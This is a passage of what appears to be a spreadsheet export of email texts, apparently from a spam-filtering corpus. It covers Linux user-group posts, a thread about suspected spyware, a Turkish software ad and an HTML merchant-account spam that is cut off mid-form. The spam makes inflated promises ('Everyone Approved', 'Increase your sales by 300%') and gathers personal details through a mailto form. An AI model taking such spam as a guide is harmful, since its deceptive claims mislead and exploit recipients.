 Technical support relating to Wrox books is available at &lt;a href="mailto:support@wrox.com"&gt;mailto:support@wrox.com&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;/p&gt;
 &lt;a href="#beginning"&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;Top&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;
 &lt;/font&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p align="center"&gt;&lt;font size="1" face="Verdana"&gt;&lt;b&gt;Wrox - Programmer to Programmer
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/default.asp?tid027"&gt;www.wrox.com?tid027&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------Multipart-Boundary-xx5UNseljF43o-----
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Gobe going GPL
</t>
  </si>
  <si>
    <t xml:space="preserve">I missed this previously, but
 the Gobe productive office suite
 (available for Linux and Windows)
 is going GPL.
 http://www.theregister.co.uk/content/4/26642.html
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [WM] CEVIRI YAZILIMLARI
</t>
  </si>
  <si>
    <t xml:space="preserve">HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgcolor=white&gt;
 &lt;table&gt;
 &lt;tr&gt;
    &lt;td&gt;
    &lt;center&gt;&lt;br&gt;
    &lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;     &lt;/center&gt;&lt;/B&gt;
    &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;P align=center&gt;&lt;FONT  color=white size =7 &gt;&lt;STRONG&gt;
 &lt;TABLE cellSpacing=1 cellPadding=1 width="501" border=5 style="WIDTH: 501px; HEIGHT: 907px"&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;IMG alt="" 
       src="http://www.bilsag.com/web1.jpg"&gt;&lt;/TD&gt;
     &lt;TD bgcolor=red&gt;&lt;FONT size=4
       color=white&gt;&lt;EM&gt;&lt;STRONG&gt;NTERNETTE KENDNZ DAHA Y HSSEDECEKSNZ.
 	  NGLZCE WEB SAYFALARININ TRKE'YE EVR YAZILIMI
 	   &lt;/STRONG&gt;&lt;/EM&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
   &lt;TD bgcolor=palegoldenrod&gt;&lt;FONT size=7 
       color=darkblue&gt;&lt;EM&gt;&lt;STRONG&gt;$ 39+KDV&lt;/STRONG&gt;&lt;/EM&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD  &gt;&lt;IMG alt="" 
       src="http://www.bilsag.com/cev1.jpg"&gt;&lt;/TD&gt;
     &lt;TD bgcolor=red&gt;&lt;FONT size=4
       color=white&gt;&lt;STRONG&gt;&lt;EM&gt; NGLZCE'DEN TRKE'YE BLGSAYAR DESTEKL
 	    METN EVR YAZILIMI  
 	 (MS-WORD ALTINDA KULLANIM, TM WINDOWS VERSYONLARI LE UYUMLU)
 	  &lt;/EM&gt;&lt;/STRONG&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
   &lt;TD bgcolor=palegoldenrod&gt;&lt;FONT size=7 
       color=darkblue&gt;&lt;STRONG&gt;&lt;EM&gt;$ 69+KDV&lt;/EM&gt;&lt;/STRONG&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD bgcolor=darkblue&gt;&lt;FONT size=6 color=white&gt;&lt;STRONG&gt;&lt;EM&gt;K YAZILIM &amp;nbsp; BRLKTE&lt;/FONT&gt;&lt;/EM&gt;    &lt;/STRONG&gt;&lt;/TD&gt;
     &lt;TD bgcolor=darkblue&gt;&lt;FONT size=7 
       color=white&gt;&lt;STRONG&gt;&lt;EM&gt;$ 
   89+KDV&lt;/EM&gt;&lt;/STRONG&gt; 
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;STRONG&gt;&lt;a href="http://www.bilsag.com/index.html"&gt;&lt;FONT color=darkcyan size=2&gt;Ayrntl Bilgi 
       in&amp;nbsp; &lt;/FONT&gt;&lt;/STRONG&gt;&lt;STRONG&gt;&lt;FONT 
       color=darkcyan size=2&gt;  tklayn&lt;/FONT&gt;&lt;/A&gt;&lt;/STRONG&gt; 
       &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/P&gt;
       &lt;P align=center&gt;
       &amp;nbsp;&lt;A href="http://www.bilsag.com/siparis.htm"&gt;&lt;IMG alt="" src="http://www.bilsag.com/sipbuton.gif" border=0
       &gt;&lt;/A&gt; &lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT color=#ff0000&gt;&lt;STRONG&gt;BLSAG Ltd.&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT size=2&gt;&lt;FONT color=#ff0000&gt;&lt;STRONG&gt;AHMET MTHAT 
       EFEND SOK. 22/1 ANKAYA 06700 / ANKARA /&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT size=2&gt;&lt;FONT color=#ff0000&gt;&lt;STRONG&gt;&lt;FONT 
       size=+0&gt;Tlf: 0312. 439 2850/ Fax: 0312. 439 9347&lt;/FONT&gt; 
       &lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;A href="mailto:bilsag@msn.com"&gt;&lt;FONT color=#ff0000 
       size=3&gt;&lt;STRONG&gt;bilsag@msn.com&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/P&gt;
     &lt;TD&gt;
       &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P align=center&gt;&amp;nbsp;&lt;/P&gt;
       &lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;form action="http://www.bilsag.com/iptal1.asp" method="post"&gt;
 &lt;center&gt;
 &lt;TABLE WIDTH="540" CELLSPACING=1 CELLPADDING=1 BORDER=0 bgcolor="#dddddd"&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR="#eeeeee" align="middle"&gt;&lt;FONT FACE="Verdana, Arial" SIZE="-1" COLOR="#000000"&gt;
 &lt;strong&gt;E-posta adres listemizden&lt;/strong&gt; kmak iin&lt;strong&gt;IKAR&lt;/strong&gt; tuuna basnz
 &lt;/FONT&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR="#eeeeee" align="middle"&gt;
 &lt;INPUT NAME="e" VALUE="webmake-talk@lists.sourceforge.net" SIZE=25 
      &gt;&lt;/FONT&gt;                   
 &lt;INPUT TYPE="submit" VALUE="kar"&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD BGCOLOR="#ffffff" align=right&gt;
 &lt;FONT FACE="arial" SIZE="1" COLOR="#000000"&gt;Bu elektronik posta: webmake-talk@lists.sourceforge.net e gnderilmitir&lt;/FONT&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;/center&gt;
 &lt;/form&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 webmake-talk mailing list
 webmake-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/webmake-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks, Martin, iwill try that, however i've only approved the minimal
 standard apps - I'll give it a go anyway. I think this is something more
 insidious than the standard adprogram - maybe i'm paranoid!!!
 Brian
 ----- Original Message -----
 From: "Martin Whelan" &lt;mwhelan@deisedesign.com&gt;
 To: &lt;iiu@taint.org&gt;
 Sent: Saturday, August 03, 2002 10:01 PM
 Subject: Re: [IIU] spyware calling home?
 &gt; It may be worth removing all your apps from the approved list. (a bit of a
 &gt; pain, I agree) then check the first app which makes the connection. With a
 &gt; bit of luck it won't be anything standard
 &gt;
 &gt; At 21:47 03/08/02 +0100, you wrote:
 &gt; &gt;Unfortunately, I don't. ZoneAlarm normally gives that info but not this
 &gt; &gt;time. It just blocks the outward access and warns me that the attempt
 &gt; &gt;occurred.
 &gt; &gt;Brian
 &gt; &gt;----- Original Message -----
 &gt; &gt;From: "Martin Whelan" &lt;mwhelan@deisedesign.com&gt;
 &gt; &gt;To: &lt;iiu@taint.org&gt;
 &gt; &gt;Sent: Saturday, August 03, 2002 9:32 PM
 &gt; &gt;Subject: Re: [IIU] spyware calling home?
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; &gt; Do you know which app is making the connection?
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 &gt; &gt; &gt; At 20:18 03/08/02 +0100, you wrote:
 &gt; &gt; &gt; &gt;Hello all
 &gt; &gt; &gt; &gt;I'm looking for advice. My pc has developed a disturbing tendency of
 &gt; &gt;trying
 &gt; &gt; &gt; &gt;to access IP 62.17.143.253 without my consent. It has got to the
 stage
 &gt; &gt;where
 &gt; &gt; &gt; &gt;normal web-browsing is almost impossible.
 &gt; &gt; &gt; &gt;I have checked IP address on RIPE database and I know precisely who
 is
 &gt; &gt;being
 &gt; &gt; &gt; &gt;called. I contacted that company on 14 July, when the problem first
 arose
 &gt; &gt; &gt; &gt;and asked for a remedy but (surprise) got no reply.
 &gt; &gt; &gt; &gt;A helpful person on the ie.comp list suggested Adaware spyware
 removal. I
 &gt; &gt; &gt; &gt;ran this and haven't had a problem again until today.
 &gt; &gt; &gt; &gt;The offending program is obviously not in Adaware db. (I run adaware
 with
 &gt; &gt; &gt; &gt;current ref files every day now).?
 &gt; &gt; &gt; &gt;Any suggestions, please,  for removing whatever the f*** is causing
 this
 &gt; &gt; &gt; &gt;from my pc?
 &gt; &gt; &gt; &gt;Brian
 &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt;
 &gt; &gt; &gt; &gt;_______________________________________________
 &gt; &gt; &gt; &gt;IIU mailing list
 &gt; &gt; &gt; &gt;IIU@iiu.taint.org
 &gt; &gt; &gt; &gt;http://iiu.taint.org/mailman/listinfo/iiu
 &gt; &gt; &gt;
 &gt; &gt; &gt;
 ========================================================================
 &gt; &gt; &gt; Martin Whelan | Dise Design | www.deisedesign.com | Tel : 086-8888975
 &gt; &gt; &gt;
 &gt; &gt; &gt; " Our core product Diseditor  allows organisations to publish
 &gt; &gt;information
 &gt; &gt; &gt; to their web site in a fast and cost effective manner. There is no
 need
 &gt; &gt;for
 &gt; &gt; &gt; a full time web developer, as the site can be easily updated by the
 &gt; &gt; &gt; organisations own staff.
 &gt; &gt; &gt; Instant updates to keep site information fresh. Sites which are
 updated
 &gt; &gt; &gt; regularly bring users back. Visit www.deisedesign.com/deiseditor.html
 for
 &gt; &gt;a
 &gt; &gt; &gt; demonstration "
 &gt; &gt; &gt;
 &gt; &gt; &gt; Diseditor  " Managing Your Information "
 &gt; &gt; &gt;
 ========================================================================
 &gt; &gt; &gt;
 &gt; &gt; &gt; _______________________________________________
 &gt; &gt; &gt; IIU mailing list
 &gt; &gt; &gt; IIU@iiu.taint.org
 &gt; &gt; &gt; http://iiu.taint.org/mailman/listinfo/iiu
 &gt; &gt; &gt;
 &gt; &gt;
 &gt; &gt;_______________________________________________
 &gt; &gt;IIU mailing list
 &gt; &gt;IIU@iiu.taint.org
 &gt; &gt;http://iiu.taint.org/mailman/listinfo/iiu
 &gt;
 &gt; ========================================================================
 &gt; Martin Whelan | Dise Design | www.deisedesign.com | Tel : 086-8888975
 &gt;
 &gt; " Our core product Diseditor  allows organisations to publish
 information
 &gt; to their web site in a fast and cost effective manner. There is no need
 for
 &gt; a full time web developer, as the site can be easily updated by the
 &gt; organisations own staff.
 &gt; Instant updates to keep site information fresh. Sites which are updated
 &gt; regularly bring users back. Visit www.deisedesign.com/deiseditor.html for
 a
 &gt; demonstration "
 &gt;
 &gt; Diseditor  " Managing Your Information "
 &gt; ========================================================================
 &gt;
 &gt; _______________________________________________
 &gt; IIU mailing list
 &gt; IIU@iiu.taint.org
 &gt; http://iiu.taint.org/mailman/listinfo/iiu
 &gt;
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Re: serial console question
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 1 Aug 2002 17:15:27 +0100 
 "John P. Looney" &lt;valen@tuatha.org&gt;  wrote:
 |  I've found a decrepit raq3 that I'm going to resurrect, as soon as I work
 | out what's up with the console.
 |  I'm using 115200 8n1 with minicom, and I'm getting wierd stuff like:
 | S+#_+ű INET __+_: 
 | S+#_+ű Ű__ M++ű _++ +_&lt;_++_.
 | S+#_+ű #+__+ S+#_+ű #+ + __+_: 
 | I+#+ _+#+_ _ +# _+ -- N+ _+#_+ű SSL
 |  So it looks like some sort of setting mismatch. Various places on the web
 | say that cobalts are setup with 115200 8n1 serial ports, but someone could
 | have changed it on this particular box.
 |  Anyone care to guess what's up ?
 One possible is that it's toggling the VTx00 alt character set. If 
 that's the case, feeding ^O to the tty somehow (i.e. cat to the device) 
 should flip it back.
 	Paul
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New  Accounts #2C6E
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a MIME Message
 ------=_NextPart_000_007F_01BDF6C7.FABAC1B0
 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0080_01BDF6C7.FABAC1B0"
 ------=_NextPart_001_0080_01BDF6C7.FABAC1B0
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 ***** This is an HTML Message ! *****
 ------=_NextPart_001_0080_01BDF6C7.FABAC1B0
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4=2E0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage=2EEditor=2EDocument"&gt;
 &lt;title&gt;FREE Computer With Merchant Account Setup&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;center&gt;
 &lt;p&gt;&lt;b&gt;COMPLETE CREDIT CARD PROCESSING SYSTEMS FOR YOUR BUSINESS=2E INTERNE=
 T -  HOME
 BASED -  MAIL ORDER -  PHONE ORDER&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;Do you accept credit cards? Your competition does!&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;Everyone Approved - Credit Problems OK!&lt;br&gt;
 Approval in less than 24 hours!&lt;br&gt;
 Increase your sales by 300%&lt;br&gt;
 Start Accepting Credit Cards on your website!&lt;br&gt;
 Free Information, No Risk, 100% confidential=2E&lt;br&gt;
 Your name and information will not be sold to thrid parties!&lt;br&gt;
 Home Businesses OK!  Phone/Mail Order OK!&lt;br&gt;
 No Application Fee, No Setup Fee!&lt;br&gt;
 Close More Impulse Sales!&lt;br&gt;
 &lt;br&gt;
 &lt;/p&gt;
 &lt;div align=3D"center"&gt;
   &lt;table border=3D"0" cellspacing=3D"0" width=3D"85%"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%"&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Times New Roman" size=3D"5" c=
 olor=3D"#CC0000"&gt;Everyone Approved!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Times New Roman"&gt; Good Credit or Bad!&amp;nbsp; To=
  apply today, please fill out
         the express form below=2E It
 contains all the information we need to get your account approved=2E For a=
 rea's
 that do not apply to you please put &amp;quot;n/a&amp;quot; in the box=2E&lt;br&gt;
 &lt;br&gt;
 Upon receipt, we'll fax you with all of the all Bank Card Application
 documents necessary to establish your Merchant Account=2E Once returned we=
  can
 have your account approved within 24 hours=2E&lt;br&gt;&amp;nbsp;&lt;/font&gt;&lt;/b&gt;
         &lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;table border=3D"10" cols=3D"3" width=3D"385"&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td align=3D"center" bgColor=3D"#990000" width=3D"119"&gt;&lt;b&gt;&lt;font colo=
 r=3D"#ffff00" face=3D"Arial,Helvetica" size=3D"3"&gt;Service&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"center" bgColor=3D"#990000" width=3D"160"&gt;&lt;b&gt;&lt;font colo=
 r=3D"#ffff00" face=3D"Arial,Helvetica" size=3D"3"&gt;Industry
         Standard&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"center" bgColor=3D"#990000" width=3D"66"&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#ffff00" face=3D"Arial,Helve=
 tica" size=3D"3"&gt;US&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;Site
         Inspection&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"middle" width=3D"160"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$50 - $75&lt;/fo=
 nt&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica"=
  size=3D"2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;Shipping&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"middle" width=3D"160"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$50 - $75&lt;/fo=
 nt&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica"=
  size=3D"2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;Warranty&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"middle" width=3D"160"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$10 Per Month=
 &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica"=
  size=3D"2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;Sales
         Receipts&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"middle" width=3D"160"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$10 - $50&amp;nbs=
 p;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica"=
  size=3D"2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;Fraud
         Screening&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;/center&gt;
     &lt;td align=3D"middle" width=3D"160"&gt;
       &lt;p align=3D"left"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;$=2E50 - $1=2E00&lt;/b&gt;&lt;br&gt;
       &lt;b&gt;Per Transaction&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
 &lt;center&gt;
 &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica" size=3D=
 "2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;Amex Set
         Up&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"middle" width=3D"160"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$50 - $75&lt;/fo=
 nt&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica"=
  size=3D"2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;24 Hour&amp;nbsp;Help
         Line&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"middle" width=3D"160"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;$10 Month&lt;/fo=
 nt&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica"=
  size=3D"2"&gt;FREE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td bgColor=3D"#ffff00" width=3D"119"&gt;&lt;b&gt;&lt;font face=3D"Arial,Helveti=
 ca" size=3D"2"&gt;Security
         Bond&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td align=3D"middle" width=3D"160"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;$5000- $10,00=
 0&lt;/b&gt;&lt;br&gt;
         &lt;b&gt;Or More&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
       &lt;td width=3D"66"&gt;&lt;b&gt;&lt;font color=3D"#3333ff" face=3D"Arial,Helvetica"=
  size=3D"2"&gt;NONE&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;&lt;p&gt;
 &lt;div align=3D"center"&gt;
   &lt;table border=3D"0" cellspacing=3D"0" width=3D"85%"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%"&gt;
         &lt;p&gt;&lt;font face=3D"Arial,Helvetica" size=3D"2"&gt;&lt;b&gt;This is a &lt;font co=
 lor=3D"#3333ff"&gt;No
         Obligation Qualification Form&lt;/font&gt; and is your first step to&lt;fon=
 t color=3D"#cc0000"&gt;
         accepting credit cards=2E&lt;/font&gt; By filling out this form you will=
  &lt;font color=3D"#3333ff"&gt;&amp;quot;not
         enter&amp;quot;&lt;/font&gt; in to any &lt;font color=3D"#006600"&gt;obligations o=
 r
         contracts &lt;/font&gt;with us=2E We will use it to determine the best p=
 rogram
         to offer you based on the information you provide=2E You will be c=
 ontacted by one of our representatives within 1-2 business days to go over =
 the rest of your account set up=2E&lt;/b&gt;&lt;/font&gt;
         &lt;p align=3D"center"&gt;&lt;font face=3D"Arial,Helvetica" size=3D"2"&gt;&lt;b&gt;&lt;=
 font color=3D"#cc0000"&gt;Note:&lt;/font&gt;&amp;nbsp;
         All Information Provided To Us &lt;font color=3D"#cc0000"&gt;Will Remain=
  100%
         Confidential&lt;/font&gt;
         !!&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;table border=3D"0"&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%"&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#000099" face=3D"arial" size=
 =3D"+2"&gt;Apply
         Free With No Risk!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;
   &lt;/center&gt;
 &lt;/form&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"0" width=3D"95%"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%"&gt;
         &lt;p align=3D"center"&gt;&lt;b&gt;&lt;i&gt;&lt;font size=3D"2" color=3D"#CC0000"&gt;Pleas=
 e fill out the
         express application form completely=2E&lt;br&gt;Incomplete information m=
 ay prevent us from properly
         processing your application=2E&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;form name=3D"form"
   method=3D"post"
   action=3D"mailto:sam31t@alloymail=2Ecom?SUBJECT=3DMerchant Form"
   enctype=3D"text/plain"
  &lt;tr&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"0" width=3D"95%"&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Your Full Emai=
 l Address:&lt;/b&gt;&lt;br&gt;
         &lt;font color=3D"#ff0000"&gt;be sure to use your full address &lt;/font&gt;(i=
 =2Ee=2E&lt;font color=3D"#ff0000"&gt;
         &lt;/font&gt;user@domain=2Ecom)&lt;/font&gt;&lt;/td&gt;
       &lt;td width=3D"39%" align=3D"center"&gt;&lt;input type=3D"text" name=3D"user=
 _email" size=3D"29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Your Name:&lt;/fo=
 nt&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"39%" align=3D"center"&gt;&lt;input type=3D"text" name=3D"Appl=
 icant_Name" size=3D"29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Business Name:=
 &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"39%" align=3D"center"&gt;&lt;input type=3D"text" name=3D"Busi=
 ness_Name" size=3D"29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Business Phone=
  Number:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"39%" align=3D"center"&gt;&lt;input type=3D"text" name=3D"Busi=
 ness_Phone" size=3D"29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Home Phone Num=
 ber:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"39%" align=3D"center"&gt;&lt;input type=3D"text" name=3D"Home=
 Phone" size=3D"29"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td width=3D"61%" align=3D"right"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Type of Busine=
 ss:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
       &lt;td width=3D"39%"&gt;
         &lt;div align=3D"left"&gt;
           &lt;table border=3D"0" width=3D"95%"&gt;
             &lt;tr&gt;
               &lt;td width=3D"12%" align=3D"center"&gt;&lt;input type=3D"radio" val=
 ue=3D"retail" name=3D"Type_Business"&gt;&lt;/td&gt;
               &lt;td width=3D"88%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Retail Business&lt;/b&gt;&lt;/f=
 ont&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
